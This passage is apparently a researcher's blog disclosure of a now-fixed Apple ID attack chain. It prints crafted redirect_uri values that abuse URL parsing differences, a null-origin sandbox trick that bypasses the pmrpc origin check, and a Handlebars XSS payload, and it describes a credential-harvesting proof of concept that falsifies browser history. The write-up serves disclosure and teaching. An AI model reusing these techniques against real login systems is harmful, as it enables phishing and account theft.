cons: probably very old browsers will ignore it If you check Chrome DevTools’s ‘network’ panel, you will find the AppleID signon page uses both X-Frame-Options: ALLOW-FROM (which essentially does nothing), and Content-Security-Policy: frame-ancestors. Here’s a cut-down version of what the Content-Security-Policy header looks like when ‘redirect_uri’ is set to the default “https://www.icloud.com/” Content-Security-Policy: frame-ancestors ‘self’ https://www.icloud.com This directs the browser to only allow embeds in iCloud. Next, what about our weirder redirect_uri, https://abc@icloud.com? Content-Security-Policy: frame-ancestors ‘self’ https://abc@www.icloud.com Very interesting! Now, humans are absolute fiends for context-clues. Human language is all about throwing a bunch of junk together and having it all picked up in context, but computers have a beautiful, childlike innocence toward them. Thus, I can set redirect_uri to ‘https://mywebsite.com;@icloud.com/’, then, the AppleID server continues to think all is well, but sends: Content-Security-Policy: frame-ancestors ‘self’ https://mywebsite.com;@www.icloud.com This is because the ‘URI’ language that’s used to express web addresses is contextually different to the language used to express Content Security Policies. ‘https://mywebsite.com;@www.icloud.com’ is a totally valid URL, meaning the same as ‘https://www.icloud.com’ but to Content-Security-Policy, the same statement means ‘https://mywebsite.com’ and then some extra garbage which gets ignored after the ‘;’. Using this, we can embed the Apple ID login page in our own page. However, not everything is quite as it seems. If you fail to be able to embed a page in chrome, you get this cute lil guy: But, instead we get a big box of absolutely nothing: Part 2: Communicating with the blank box Our big box, though blank, is not silent. When our page loads, the browser console gives us the following cryptic message: {"type":"ERROR","title":"PMRPErrorMessageSequence","message":"APPLE ID : PMRPC Message Sequence log fail at AuthWidget.","iframeId":"601683d3-4d35-4edf-a33e-6d3266709de3","details":"{\"m\":\"a:28632989 b:DEA2CA08 c:req h:rPR e:wSR:SR|a:28633252 b:196F05FD c:req h:rPR e:wSR:SR|a:28633500 b:DEA2CA08 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28633598 b:B74DD348 c:req h:rPR e:wSR:SR|a:28633765 b:196F05FD c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634110 b:BE7671A8 c:req h:rPR e:wSR:SR|a:28634110 b:B74DD348 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28634621 b:BE7671A8 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28635123 b:E6F267A9 c:req h:rPR e:wSR:SR|a:28635130 b:25A38CEC c:req h:r e:wSR:SR|a:28635635 b:E6F267A9 c:rRE f:Application error. Destination unavailable. 500 h:rPR e:f2:rRE|a:28636142 b:25A38CEC c:rRE f:Application error. Destination unavailable. 1000 h:r e:f2:rRE\",\"pageVisibilityState\":\"visible\"}"} This message is mostly useless for discerning what exactly is going wrong. At this point, I like to dig more into the client code itself to work out the context of this error. The Apple ID application is literally millions of lines of code, but I have better techniques — in this case, if we check the Network panel in Chrome DevTools, we can see that when an error occurs, a request is sent to ‘https://idmsa.apple.com/appleauth/jslog’, assumedly to report to Apple that an error occurred. Chrome DevTools’ ‘sources’ panel has a component on the right called “XHR/fetch Breakpoints” which can be used to stop the execution of the program when a particular web address is requested. Using this, we can pause the application at the point the error occurs, and ask our debugger to go backwards to the condition that caused the failure in the first place. Eventually, stepping backward, there’s this: new Promise(function(e, n) { it.call({ destination: window.parent, publicProcedureName: "ready", params: [{ iframeTitle: d.a.getString("iframeTitle") }], onSuccess: function(t) { e(t) }, onError: function(t) { n(t) }, retries: p.a.meta.FEConfiguration.pmrpcRetryCount, timeout: p.a.meta.FEConfiguration.pmrpcTimeout, destinationDomain: p.a.destinationDomain }) } The important part here is window.parent, which is our fake version of iCloud. It looks like the software inside AppleID is trying to contact our iCloud parent when the page is ready and failing over and over (see: retries). This communication is happening over the postMessage (the ‘pm’ of pmrpc ). Lastly, the code is targeting a destinationDomain, which is likely set to something like https://www.icloud.com ; then, since our embedding page is not that domain, there’s a failure. We can inject code into the AppleID Javascript and the iCloud javascript to view their version of this conversation: AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”receivePingRequest”,”params”:[“ready”],”id”:”9BA799AA-6777–4DCC-A615-A8758C9E9CE2"} AppleID tells iCloud it’s ready to receive messages. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”9BA799AA-6777–4DCC-A615-A8758C9E9CE2",”result”:true} iCloud responds to the ping request with a ‘pong’ response. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”ready”,”params”:[{“iframeTitle”:” Sign In with Your Apple ID”}],”id”:”E0236187–9F33–42BC-AD1C-4F3866803C55"} AppleID tells iCloud that the frame is named ‘Sign in with Your Apple ID’ (I’m guessing to make the title of the page correct). iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”E0236187–9F33–42BC-AD1C-4F3866803C55",”result”:true} iCloud acknowledges receipt of the title. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”receivePingRequest”,”params”:[“config”],”id”:”87A8E469–8A6B-4124–8BB0–1A1AB40416CD”} AppleID asks iCloud if it wants the login to be configured. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”87A8E469–8A6B-4124–8BB0–1A1AB40416CD”,”result”:true} iCloud acknowledges receipt of the configuration request, and says that it does, yes want the login to be configured. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”method”:”config”,”params”:[],”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”} AppleID asks iCloud for a login dialog configuration. iCloud → AppleID: pmrpc.{“jsonrpc”:”2.0",”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”,”result”:{“data”:{“features”:{“rememberMe”:true,”createLink”:false,”iForgotLink”:true,”pause2FA”:false},”signInLabel”:”Sign in to iCloud”,”serviceKey”:”d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d”,”defaultAccountNameAutoFillDomain”:”icloud.com”,”trustTokens”:[“HSARMTnl/S90E=SRVX”],”rememberMeLabel”:”keep-me-signed-in”,”theme”:”dark”,”waitAnimationOnAuthComplete”:false,”logo”:{“src”:”data:image/png;base64,[ … ]ErkJggg==”,”width”:”100px”}}}} iCloud configures the login dialog. This includes data like the iCloud logo to display, the caption “Sign in to iCloud”, and, for example whether a link should be provided for if the user forgets their password. AppleID → iCloud: pmrpc.{“jsonrpc”:”2.0",”id”:”252F2BC4–98E8–4254–9B19-FB8042A78E0B”,”result”:true} iCloud confirms receipt of the login configuration. In order to make our bootleg iCloud work, we will need code that completes the conversation in the same way. You can look at a version I made, here. Our next problem is that destinationDomain I pointed out before: postMessage ensures that snot-nosed kids trying to impersonate iCloud can’t just impersonate iCloud — by having every postMessage have a targetOrigin, basically a specified destination of the webpage. It’s not enough that the message gets sent to window.parent; that parent must also be securely specified to prevent information going the wrong place. Part 3: Snot-Nosed Kid Mode This one isn’t as easy as reading what AppleID does and copying it. We need to find another security flaw between our single input, redirect_uri , through to destinationDomain, and then finally on to postMessage. Again, the goal here is to find some input redirect_uri that still holds the exploit conditions from Part 1, but also introduces new exploit conditions for this security boundary. By placing a breakpoint at the destinationDomain line we had before, we can see that unlike both the AppleID server and Content-Security-Policy, the whole redirect_uri parameter, ‘https://mywebsite.com;@wwwicloud.com’ is being passed to postMessage, as though it were this code: window.parent.postMessage(data_to_send, "https://mywebsite.com;@www.icloud.com"); At first, this seems like an absolute impasse. In no possible way is our page going to be at the address ‘https://mywebsite.com;@www.icloud.com’. However, once you go from the reference documentation, to the technical specification the plot very much thickens. In section 9.4.3 of the HTML standard, the algorithm for comparing postMessage origins is specified, and step 5 looks like this: Let parsedURL be the result of running the URL parser on targetOrigin. If parsedURL is failure, then throw a “SyntaxError" DOMException. Set targetOrigin to parsedURL’s origin. Crucially, despite “https://mywebsite.com;@www.icloud.com” being not at all a valid place to send a postMessage, the algorithm extracts a valid origin from it (i.e. it becomes https://www.icloud.com). Again, this allows us purchase to sneak some extra content in there to potentially confuse other parts of AppleID’s machinery. The source for the AppleID login page starts with a short preamble that tells the AppleID login framework what the destination domain (in this case iCloud) is for the purpose of login: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;@www.icloud.com"); This information eventually bubbles down to the destinationDomain we’re trying to mess with. When toying with ‘redirect_uri’, I found that there’s a bug in the way this functionality is programmed in Apple’s server. For an input ‘https://mywebsite.com;"@www.icloud.com’ (note the double quote), this code is produced: bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); The double quote is ‘escaped’ with a ‘\’ to ensure that we don’t break out of the quoted section and start executing our own code, however something a little odd happens when we input instead ‘https://mywebsite.com;%22@www.icloud.com’. ‘%22’ is what you get from ‘encodeURIComponent’ of a double quote, the opposite of what apple is doing here. bootData.destinationDomain = decodeURIComponent("https://mywebsite.com;\"@www.icloud.com"); We get exactly the same response! This means that Apple is already doing a decodeURIComponent on the server before it even reaches this generated Javascript. Then, the generated Javascript is again performing the same decoding. Someone made the mistake of doing the same decoding on the client and server, but it didn’t become a functionality breaking bug because the intended usage doesn’t have any doubly encoded components. We can, however introduce these. 😉 Because the server is using the decodeURIComponent-ed form, and the client is using the twice decodeURIComponent-ed form, we can doubly encode special modifier characters in our URI that we want only the client to see — while still passing all the server-side checks! After some trial and error, I determined that I can set redirect_uri to: https%3A%2F%2Fmywebsite.com%253F%20mywebsite.com%3B%40www.icloud.com This order of operations then happens: AppleID’s server decodeURIComponent-s it, producing: https://mywebsite.com%3F mywebsite.com;@www.icloud.com AppleID’s server parses the origin from https://mywebsite.com%3F mywebsite.com;@www.icloud.com , and gets https://www.icloud.com , which passes the first security check AppleID’s server takes the once-decodeURIComponent-ed form and sends Content-Security-Policy: allow-origin https://mywebsite.com%3F mywebsite.com;@www.icloud.com The browser parses the Content-Security-Policy directive and parses out origins again, allowing embedding of the iCloud login from both ‘https://mywebsite.com%3f’ (which is nonsense) and ‘mywebsite.com’ (which is us!!!!). This passes the second security check and allows the page to continue loading. AppleID’s server generates the sign in page with the Javascript bootData.destinationDomain = decodeURIComponent(“https://mywebsite.com%3F mywebsite.com;@www.icloud.com"); The second decodeURIComponent sets bootData.destinationDomain to https://mywebsite.com? mywebsite.com;@www.icloud.com When the AppleID client tries to send data to www.icloud.com, it sends it to https://mywebsite.com? mywebsite.com;@www.icloud.com The browser when performing postMessage parses an origin again again (!!) from https://mywebsite.com? mywebsite.com;@www.icloud.com . The ‘?’ causes everything after it to be ignored, resulting in the target origin ‘https://mywebsite.com’. This passes the third security check. However, this is only half of our problems, and our page will stay blank. Here’s what a blank page looks like, for reference: Part 4: Me? I’m Nobody. Though now we can get messages from iCloud, we cannot perform full initialisation of the login dialog without also sending them. However, AppleID checks the senders of all messages it gets, and that mechanism is also totally different from the one that is used for a postMessage send. The lowest-level browser mechanism that AppleID must be inevitably calling sadly does not perform some abusable parse step beforehand. A typical message origin check looks like this: if (message.origin != "https://safesite.com") throw new Error("hey!! thats illegal!"); This is just a ‘strict string comparison’, which means that we would, in theory have to impossibly be the origin https://mywebsite.com? mywebsite.com;@www.icloud.com which has no chance of ever happening on God’s green earth. However, the PMRPC protocol is actually open source, and we can view its own version of this check online. Receipt of a message is handled by ‘processJSONRpcRequest’, defined in ‘pmrpc.js’. Line 254 decides if the request needs to be checked for security via an ACL (Access Control List) as follows: 254: !serviceCallEvent.shouldCheckACL || checkACL(service.acl, serviceCallEvent.origin) This checks a value called ‘shouldCheckACL’ to determine if security is disabled, I guess 😉 That value, in turn comes from line 221: 221: shouldCheckACL : !isWorkerComm And then isWorkerComm comes to us via lines 205–206: 205: var eventSource = eventParams.source; 206: var isWorkerComm = typeof eventSource !== "undefined" && eventSource !== null; ‘eventParams’ is the event representing the postMessage, and ‘event.source’ is a reference to the window (i.e. page) that sent the message. I’d summarise this check as follows: if (message.source !== null && !(message.origin === "https://mywebsite.com? mywebsite.com;@www.icloud.com")) That means the origin check is completely skipped if message.source is ‘null’. Now, I believe the intention here is to allow rapid testing of pmrpc-based applications: if you are making up a test message for testing, its ‘source’ can be then set to ‘null’, and then you no longer need to worry about security getting in the way. Good thing section 9.4.3, step 8.3 of the HTML standard says a postMessage event’s source is always a ‘WindowProxy object’, so it can never be ‘null’ instead, right? Ah, but section 8.6 of the HTML standard defines an iframe sandboxing flag ‘allow-same-origin’, which, if not present in a sandboxed iframe sets the ‘Sandboxed origin browsing context flag’ (defined in section 7.5.3) which ‘forces the content into a unique origin’ (defined in section 7.5.5), which makes the window an ‘opaque origin’ (defined in section 7.5), which when given to Javascript is turned into null (!!!!). This means when we create an embedded, sandboxed frame, as long as we don’t provide the ‘allow-same-origin’ flag, we create a special window that is considered to be null , and thus bypasses the pmrpc security check on received messages. A ‘null’ page however, is heavily restricted, and, importantly, if our attack page identifies as null via this trick, all the other checks we worked so hard to bypass will fail. Instead, we can embed both Apple ID with all the hard work we did before, and a ‘null’ page. We can still postMessage to the null page, so we use it to forward our messages on to Apple ID, which thinks since it is a ‘null’ window, it must have generated them itself. You can read my reference implementation of this forwarding code, here. Part 5: More than Phishing Now that AppleID thinks we’re iCloud, we can mess around with all of those juicy settings that it gets. How about offering a free Apple gift card to coerce the user into entering their credentials? In our current state, having tricked Apple ID into thinking that we’re iCloud, we have a little box that fills in your apple email very nicely. When you log in to our embed we get an authentication for your Apple account over postMessage. Even if you don’t 2FA! This is because an authentication token is granted without passing 2FA for iCloud ‘Find My’, used for finding your potentially lost phone (which you might need to pass 2FA otherwise). However, this is basically phishing — although this is extremely high-tech phishing, I have no doubt the powers that be will argue that you could just make a fake AppleID page just the same. We need more. We’re already in a position of extreme privilege. Apple ID thinks we’re iCloud, so it’s likely that our interactions with the Apple ID system will be a lot more trusting with what we ask of it. As noted before, we can set a lot of configuration settings that affect how the login page is displayed: pmrpc.{"jsonrpc":"2.0","id":"252F2BC4-98E8-4254-9B19-FB8042A78E0B","result":{"data":{"features":{"rememberMe":true,"createLink":false,"iForgotLink":true,"pause2FA":false},"signInLabel":"Sign in to iCloud","serviceKey":"d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d","defaultAccountNameAutoFillDomain":"icloud.com","trustTokens":["HSARMTnl/S90E=SRVX"],"rememberMeLabel":"keep-me-signed-in","theme":"dark","waitAnimationOnAuthComplete":false,"logo":{"src":"data:image/png;base64,[ ... ]ErkJggg==","width":"100px"}}}} That’s all well and good, but what about the options that iCloud can use, but simply chooses not to? They won’t be here, but we can use Chrome DevTools’ ‘code search’ feature to search all the code the Apple ID client software uses. ‘signInLabel’ makes a good search term as it probably doesn’t turn up anywhere else: d()(w.a, "envConfigFromConsumer.signInLabel", "").trim() && n.attr("signInLabel", w.a.envConfigFromConsumer.signInLabel), It looks like all of these settings like ‘signInLabel’ are part of this ‘envConfigFromConsumer’, so we can search for that: this.attr("testIdpButtonText", d()(w.a, "envConfigFromConsumer.testIdpButtonText", "Test")) d()(w.a, "envConfigFromConsumer.accountName", "").trim() ? (n.attr("accountName", w.a.envConfigFromConsumer.accountName.trim()), n.attr("showCreateLink", d()(w.a, "envConfigFromConsumer.features.createLink", !0)), n.attr("showiForgotLink", d()(w.a, "envConfigFromConsumer.features.iForgotLink", !0)), n.attr("learnMoreLink", d()(w.a, "envConfigFromConsumer.learnMoreLink", void 0)), n.attr("privacyText", d()(w.a, "envConfigFromConsumer.privacy", void 0)), n.attr("showFooter", d()(w.a, "envConfigFromConsumer.features.footer", !1)), n.attr("showRememberMe") && ("remember-me" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() ? n.attr("rememberMeText", l.a.getString("rememberMe")) : "keep-me-signed-in" === d()(w.a, "envConfigFromConsumer.rememberMeLabel", "").trim() && n.attr("rememberMeText", l.a.getString("keepMeSignedIn")), n.attr("isRememberMeChecked", !!d()(w.a, "envConfigFromConsumer.features.selectRememberMe", !1) || !!d()(w.a, "accountName", "").trim())), i = d()(w.a, "envConfigFromConsumer.verificationToken", ""), These values we know from our config get given different names to put into a template. For example, ‘envConfigFromConsumer.features.footer’ becomes ‘showFooter’. In DevTools’ network panel, we can search all resources, code and otherwise the page uses for where these inputs end up: {{#if showRememberMe}} <div class="si-remember-password"> <input type="checkbox" id="remember-me" class="form-choice form-choice-checkbox" {($checked)}="isRememberMeChecked"> <label id="remember-me-label" class="form-label" for="remember-me"> <span class="form-choice-indicator"></span> {{rememberMeText}} </label> </div> What a lovely blast from the past! These are handlebars templates, a bastion of the glorious web 2.0 era I started my career in tech in! Handlebars has a bit of a dirty secret. ‘{{value}}’ statements work like you expect, safely putting content into the page; but ‘{{{value}}}’ extremely unsafely injects potentially untrusted HTML code — and for most inputs looks just the same! Let’s see if an Apple engineer made a typo by searching the templates for “}}}”: {{#if showLearnMoreLink}} <div> {{{learnMoreLink}}} </div> {{/if}} {{#if showPrivacy}} <div class="label-small text-centered centered tk-caption privacy-wrapper"> <div class="privacy-icon"></div> {{{privacyText}}} </div> {{/if}} Perfect! From our previous research, we know that ‘privacyText’ comes from the configuration option ‘envConfigFromConsumer.privacy’, or just ‘privacy’. Once we re-configure our client to send the configuration option { "privacy": "<img src=fake onerror='alert(document.domain)'" } , Apple ID will execute our code and show a little popup indicating what domain we have taken over: Part 6: Overindulgence Now it’s time to show off. Proof of concepts are all about demonstrating impact, and a little pop-up window isn’t scary enough. We have control over idmsa.apple.com, the Apple ID server browser client, and so we can access all the credentials saved there — your apple login and cookie — and in theory, we can ‘jump’ to other apple login windows. Those credentials are all stored in a form that we can use to take over an apple account, but they’re not a username and password. That’s what I think of as scary. For my proof of concept, I: Execute my full exploit chain to take over Apple ID. This requires only one click from the user. Present the user with a ‘login with AppleID’ button by deleting all the content of the Apple ID login page and replacing it with the standard button Open a new window to the real, full Apple ID login page, same as apple would when the button is clicked With our control of idmsa.apple.com, take control over the real Apple ID login dialog and inject our own code which harvests the logins as they are typed Manipulate browser history to set the exploit page location to https://apple.com, and then delete the history record of being on the exploit page — if the user checks if they came from a legitimate Apple site, they’ll just see apple.com and be unable to go back. Full commented source code can be found here. Video demonstration of the Proof of Concept on desktop Although I started this project before apple had its bug bounty program, I reported it just as the bug bounty program started and so I inadvertently made money out of it. Apple paid me $10,000 for my bug and proof of concept, which, while I’m trying not to be a shit about it, is 2.5 times lower than the lowest bounty on their Example Payouts page, for creating an app that can access “a small amount of sensitive data”. Hopefully other researchers are paid more! I also hope this was an interesting read! I took a really long time to write this with the pandemic kind of sapping my energy, and my sincere hope that despite the technical complexity here, I could write something accessible to those new to security. Thomas Thanks to perribus, iammandatory, and taviso for reviewing earlier versions of this disclosure. If Apple is reading this, please do something about my other bug reports, it has been literally years, and also add my name to the Apple Hall of fame 🥺🥺 Full timeline follows this article. edit: Apple says my Hall of Fame will happen in September! edit: September is almost over and it hasn’t happened! Timeline Report to fix time: 3 days Fix to offer time: 4 months, 3 days Payment offer to payment time: 4 months, 5 days Total time: 8 months, 8 days Friday, November 15th 2019 First apple bug, an XSS on apple.com reported Saturday, November 16th 2019 Issues noticed in Apple ID The previous bug I reported has been mitigated, but no email from Apple about it Thursday, November 21st 2019, 3:43AM GMT First proof of concept sent to Apple demonstrating impersonating iCloud to Apple ID, using it to steal Apple user’s information. Thursday, November 21st 2019, 6:06AM GMT Templated response from Apple, saying they’re looking into it Thursday, November 21st 2019, 8:20PM GMT Provided first Apple ID proof of concept which injects malicious code, along with some video documentation. Sunday, November 24th 2019 The issue is mitigated (partially fixed) by Apple Thursday, November 28th 2019 Ask for updates Wednesday, December 4th 2019 I try to pull some strings with friends to get a reply Tuesday, December 3rd 2019 Apple tells me there is nothing to share with me December 10th 2019 I ask if there is an update Friday, January 10th 2019 I get an automated email saying, in essence (1) don’t disclose the bug to the public until ‘investigation is complete’ and (2) Apple will provide information over the course of the investigation. Email for an update Wednesday, January 29th 2020 Ask for another update (at the 2 month mark) Friday, January 31st 2020 Am asked to check if it’s been fixed. Yes, but not exactly in the way I might have liked. Sunday, February 2nd 2020 At Schmoocon, a security conference in Washington DC I happen to meet the director of the responsible disclosure program. I talk about the difficulties I’ve had. Tuesday, February 4th 2020 Apple confirms the bug as fixed and asks for my name to give credit on the Apple Hall of Fame as of August 2021, I have still not been publicly credited. I reply asking if this is covered by the bounty program. Apple responds saying that they will let me know later. Saturday, February 15th 2020 I ask for an update on status Monday, February 17th 2020 Apple responds: no updates. I ask when I’ll hear back Friday, February 21st 2020 I contact the director of the program with the details I got at schmoo, asking when the expected turnaround on bugs is Monday, March 2nd 2020 Apple responds. They say they have no specfic date Tuesday, March 3rd 2020 The director responds, saying they don’t give estimates on timelines, but he’ll get it looked into Tuesday, March 24th 2020 Offered $10,000 for the Apple ID code injection vulnerability. Asked to register as an Apple developer so I can get paid through there Sunday, March 29th 2020 Enroll in the Apple Developer program, and ask when I’ll be able to disclose publicly. Tuesday, March 31st 2020 Told to accept the terms and set up my account and tax information (I am not told anything about disclosure) Tuesday, March 31st 2020 Ask for more detailled instructions, because I can’t find out how to set up my account and tax information (this is because my Apple Developers application has not yet been accepted) Thursday, April 2nd 2020 Ask if this is being considered as a generic XSS because the payout seems weird compared to the examples Tuesday, April 28th Apple replies to request for more detailed instructions (it’s the same thing, but reworded) May 13th 2020 I ask for an update May 18th 2020 Am told the money is “in process to be paid”, with no exact date but expected in May or early June. They’ll get back when they know. May 23rd 2020 I am told my information has been sent to the accounts team, and that Apple will contact me about it when appropriate. May 18th 2020 I ask again when I can disclose. June 8th 2020 I ask for some kind of update on payment or when I can disclose. June 10th 2020 I am informed that there is ‘a new process’. The new process means I pay myself for my Apple Developers account, and Apple reimburses me that cost. I tell Apple I did this several months ago, and ask how my bug was classified within the program. I also contact the Apple security director asking if I can get help. He’s no longer with Apple. June 15th 2020 Apple asks me to provide an ‘enrolment ID’. June 15th 2020 I send apple a screenshot of what I am seeing. All my application shows is ‘Contact us to continue your enrolment’. I say I’m pretty frustrated and threaten to disclose the vulnerability if I am not given some way forward on several questions: (1) how the bug was classified (2) when I can disclose this and (3) what I am missing to get paid I also rant about it on twitter, which was probably the most productive thing I did to get a proper response in retrospect June 19th 2020 Apple gets in touch, saying they’ve completed the account review and now I need to set up a bank account to get paid in. Apple says they’re OK with disclosing, as long as the issue is addressed in an update. Apple asks for a draft of my disclosure Thursday, July 2nd 2020 The Apple people are very gracious. They say thanks for the report, and say my writeup is pretty good. Whoever is answering is very surprised by, and asks me to correct where I say I found this bug only “a few days ago” in the draft I wrote 🤔 July 29th 2020 I get paid … the pandemic happens 12 August 2021 I finish my writeup! Amendments 22/Aug/21: Fixed link to ‘full source code’, which originally linked to only a very small portion of the full source. Source: https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41
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